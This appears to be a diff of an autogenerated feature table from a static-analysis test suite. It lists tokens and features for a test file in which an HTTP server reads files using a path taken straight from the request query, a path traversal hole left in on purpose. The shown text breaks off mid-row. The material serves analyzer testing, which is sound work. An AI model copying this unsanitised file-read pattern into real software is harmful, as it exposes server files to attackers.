fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:1:18:1:21 | 'fs' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/tainted-array-steps.js:1:18:1:21 | 'fs' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-array-steps.js:1:18:1:21 | 'fs' | calleeImports | | | autogenerated/TaintedPath/tainted-array-steps.js:1:18:1:21 | 'fs' | contextFunctionInterfaces | | | autogenerated/TaintedPath/tainted-array-steps.js:1:18:1:21 | 'fs' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-array-steps.js:1:18:1:21 | 'fs' | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:2:5:2:8 | http | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:2:5:2:8 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:2:5:2:8 | http | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:2:5:2:26 | http | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:2:5:2:26 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:2:5:2:26 | http | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:2:5:2:26 | http = ... 'http') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:2:5:2:26 | http = ... 'http') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:2:5:2:26 | http = ... 'http') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:2:12:2:18 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:2:12:2:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:2:12:2:18 | require | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:2:12:2:26 | exceptional return of require('http') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:2:12:2:26 | exceptional return of require('http') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:2:12:2:26 | exceptional return of require('http') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:2:12:2:26 | require('http') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:2:12:2:26 | require('http') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:2:12:2:26 | require('http') | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:2:20:2:25 | 'http' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/tainted-array-steps.js:2:20:2:25 | 'http' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-array-steps.js:2:20:2:25 | 'http' | calleeImports | | | autogenerated/TaintedPath/tainted-array-steps.js:2:20:2:25 | 'http' | contextFunctionInterfaces | | | autogenerated/TaintedPath/tainted-array-steps.js:2:20:2:25 | 'http' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-array-steps.js:2:20:2:25 | 'http' | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:3:5:3:7 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:3:5:3:7 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:3:5:3:7 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:3:5:3:7 | url | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:3:5:3:24 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:3:5:3:24 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:3:5:3:24 | url | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:3:5:3:24 | url = require('url') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:3:5:3:24 | url = require('url') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:3:5:3:24 | url = require('url') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:3:11:3:17 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:3:11:3:17 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:3:11:3:17 | require | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:3:11:3:24 | exceptional return of require('url') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:3:11:3:24 | exceptional return of require('url') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:3:11:3:24 | exceptional return of require('url') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:3:11:3:24 | require('url') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:3:11:3:24 | require('url') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:3:11:3:24 | require('url') | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:3:19:3:23 | 'url' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/tainted-array-steps.js:3:19:3:23 | 'url' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-array-steps.js:3:19:3:23 | 'url' | calleeImports | | | autogenerated/TaintedPath/tainted-array-steps.js:3:19:3:23 | 'url' | contextFunctionInterfaces | | | autogenerated/TaintedPath/tainted-array-steps.js:3:19:3:23 | 'url' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-array-steps.js:3:19:3:23 | 'url' | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:4:5:4:12 | sanitize | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:4:5:4:12 | sanitize | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:4:5:4:12 | sanitize | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:4:5:4:43 | sanitiz ... ename') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:4:5:4:43 | sanitiz ... ename') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:4:5:4:43 | sanitiz ... ename') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:4:16:4:22 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:4:16:4:22 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:4:16:4:22 | require | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:4:16:4:43 | exceptional return of require ... ename') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:4:16:4:43 | exceptional return of require ... ename') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:4:16:4:43 | exceptional return of require ... ename') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:4:16:4:43 | require ... ename') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:4:16:4:43 | require ... ename') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:4:16:4:43 | require ... ename') | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:4:24:4:42 | 'sanitize-filename' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/tainted-array-steps.js:4:24:4:42 | 'sanitize-filename' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-array-steps.js:4:24:4:42 | 'sanitize-filename' | calleeImports | | | autogenerated/TaintedPath/tainted-array-steps.js:4:24:4:42 | 'sanitize-filename' | contextFunctionInterfaces | | | autogenerated/TaintedPath/tainted-array-steps.js:4:24:4:42 | 'sanitize-filename' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-array-steps.js:4:24:4:42 | 'sanitize-filename' | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:5:5:5:14 | pathModule | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:5:5:5:14 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:5:5:5:14 | pathModule | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:5:5:5:32 | pathMod ... 'path') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:5:5:5:32 | pathMod ... 'path') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:5:5:5:32 | pathMod ... 'path') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:5:18:5:24 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:5:18:5:24 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:5:18:5:24 | require | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:5:18:5:32 | exceptional return of require('path') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:5:18:5:32 | exceptional return of require('path') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:5:18:5:32 | exceptional return of require('path') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:5:18:5:32 | require('path') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:5:18:5:32 | require('path') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:5:18:5:32 | require('path') | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:5:26:5:31 | 'path' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/tainted-array-steps.js:5:26:5:31 | 'path' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-array-steps.js:5:26:5:31 | 'path' | calleeImports | | | autogenerated/TaintedPath/tainted-array-steps.js:5:26:5:31 | 'path' | contextFunctionInterfaces | | | autogenerated/TaintedPath/tainted-array-steps.js:5:26:5:31 | 'path' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-array-steps.js:5:26:5:31 | 'path' | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:8:5:8:10 | server | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:5:8:10 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:5:8:10 | server | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:8:5:15:2 | server | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:5:15:2 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:5:15:2 | server | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:8:5:15:2 | server ... NCY]\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:5:15:2 | server ... NCY]\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:5:15:2 | server ... NCY]\\n}) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:8:14:8:17 | http | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:14:8:17 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:14:8:17 | http | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:8:14:8:30 | http.createServer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:14:8:30 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:14:8:30 | http.createServer | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:8:14:15:2 | exceptional return of http.cr ... NCY]\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:14:15:2 | exceptional return of http.cr ... NCY]\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:14:15:2 | exceptional return of http.cr ... NCY]\\n}) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:8:14:15:2 | http.cr ... NCY]\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:14:15:2 | http.cr ... NCY]\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:14:15:2 | http.cr ... NCY]\\n}) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:8:19:8:30 | createServer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:19:8:30 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:19:8:30 | createServer | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:8:31 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:8:31 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:8:31 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:8:31 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:8:31 | fs | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:8:31 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:8:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:8:31 | this | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:8:31 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:8:31 | this | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:8:31 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:8:31 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:8:31 | url | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:8:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:8:31 | url | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | 'arguments' object of anonymous function | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | exceptional return of anonymous function | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | functio ... ENCY]\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | functio ... ENCY]\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | functio ... ENCY]\\n} | calleeImports | http | @@ -10718,6 +84625,86 @@ tokenFeatures | autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | functio ... ENCY]\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | functio ... ENCY]\\n} | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | functio ... ENCY]\\n} | receiverName | http | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:8:32:15:1 | return of anonymous function | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:8:41:8:43 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:41:8:43 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:41:8:43 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:41:8:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:8:41:8:43 | req | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:8:41:8:43 | req | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:8:41:8:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:8:41:8:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:8:41:8:43 | req | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:8:41:8:43 | req | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:8:46:8:48 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:46:8:48 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:46:8:48 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:8:46:8:48 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:8:46:8:48 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:8:46:8:48 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:8:46:8:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:8:46:8:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:8:46:8:48 | res | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:8:46:8:48 | res | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:9:7:9:10 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:9:7:9:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:9:7:9:10 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:9:7:9:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:9:7:9:10 | path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:9:7:9:48 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:9:7:9:48 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:9:7:9:48 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:9:7:9:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:9:7:9:48 | path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:9:7:9:48 | path = ... ry.path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:9:7:9:48 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:9:7:9:48 | path = ... ry.path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:9:7:9:48 | path = ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:9:7:9:48 | path = ... ry.path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:16 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:16 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:16 | url | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:16 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:16 | url | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:22 | url.parse | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:22 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:22 | url.parse | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:22 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:22 | url.parse | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:37 | exceptional return of url.par ... , true) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:37 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:37 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:37 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:37 | exceptional return of url.par ... , true) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:37 | url.par ... , true) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:37 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:37 | url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:37 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:37 | url.par ... , true) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:43 | url.par ... ).query | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:43 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:43 | url.par ... ).query | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:43 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:43 | url.par ... ).query | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:48 | url.par ... ry.path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:48 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:48 | url.par ... ry.path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:48 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:9:14:9:48 | url.par ... ry.path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:9:18:9:22 | parse | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:9:18:9:22 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:9:18:9:22 | parse | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:9:18:9:22 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:9:18:9:22 | parse | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:9:24:9:26 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:9:24:9:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:9:24:9:26 | req | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:9:24:9:26 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:9:24:9:26 | req | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:9:24:9:30 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/tainted-array-steps.js:9:24:9:30 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-array-steps.js:9:24:9:30 | req.url | calleeImports | url | @@ -10727,6 +84714,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-array-steps.js:9:24:9:30 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-array-steps.js:9:24:9:30 | req.url | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:9:24:9:30 | req.url | receiverName | url | +| autogenerated/TaintedPath/tainted-array-steps.js:9:28:9:30 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:9:28:9:30 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:9:28:9:30 | url | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| 